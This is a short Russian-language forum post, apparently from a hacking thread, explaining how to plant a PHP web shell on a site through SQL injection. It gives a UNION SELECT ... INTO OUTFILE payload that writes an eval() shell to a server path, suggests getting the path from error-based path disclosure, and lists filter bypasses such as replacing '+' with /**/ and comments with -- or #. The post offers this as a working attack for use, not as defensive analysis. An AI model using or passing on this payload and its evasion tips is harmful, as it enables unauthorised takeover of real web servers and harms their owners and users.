Показать сообщение отдельно

  #215  
Старый 24.08.2009, 16:49
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию

Если у юзера в mysql есть права на запись,то в регистрации например вместо email вписываешь
Код:
'+union+select+'<? eval($a); ?>'+into+otfile+'C:/blablabla/1.php'/*
Вместо eval можно окно для загрузки,кто-то выкладывал вроде.
Вместо blablabla пишешь путь который тебе нужен,взять можно из ошибки. Например
Цитата:
http://site.ru/torrent/details.php?id[]=11111
Или в начале темы там выкладывали раскрытия путей.
У меня было один раз что "+" не катил,заменял на /**/.Так же если комментарий "/*" не катит,заменяй на -- или #
 
Ответить с цитированием